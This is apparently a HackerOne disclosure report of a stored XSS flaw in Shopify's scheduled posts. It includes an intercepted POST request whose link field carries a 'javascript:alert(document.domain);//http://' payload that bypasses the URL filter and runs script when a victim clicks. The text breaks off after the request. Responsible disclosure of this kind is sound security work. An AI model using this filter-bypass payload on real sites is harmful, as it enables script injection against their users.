Shopify: Stored passive XSS at scheduled posts (

ID H1:214581
Type hackerone
Reporter skavans
Modified 2017-03-28T20:57:36



There is improper filtration of the website link field of scheduled post. Attacker can intercept the scheduled post creation/modifying request and change it content the following way:

```http POST /pages/175422/manual_posts/31163 HTTP/1.1 Host: <redacted>

-----------------------------15916813141840537191014403553 Content-Disposition: form-data; name="manual_post[link]"

javascript:alert(document.domain);//http:// -----------------------------15916813141840537191014403553 <redacted> ```

that leads to filter bypass and JS execution while victim clicks the link: